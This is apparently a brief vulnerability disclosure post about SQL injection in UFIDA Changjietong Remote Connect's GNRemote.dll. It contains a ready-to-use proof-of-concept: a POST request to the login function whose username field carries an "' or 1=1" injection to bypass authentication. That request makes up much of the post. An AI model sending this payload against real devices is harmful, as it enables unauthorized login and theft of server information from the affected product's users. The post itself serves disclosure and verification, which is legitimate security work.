Ufida Changjietong Remote Connect Gnremote Dll Sql Injection Vulnerability
Ufida Changjietong Remote Connect Gnremote Dll Sql Injection Vulnerability
UFIDA Changjietong Remote Connect GNRemote.dll SQL injection vulnerability
Vulnerability Description
UFIDA Changjietong Remote Connect GNRemote.dll SQL injection vulnerability, attackers can obtain server sensitive information or use universal password to log in to the device
Vulnerability Impact
UFIDA Changjietong Remote Connect
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
This post is licensed under CC BY 4.0 by the author.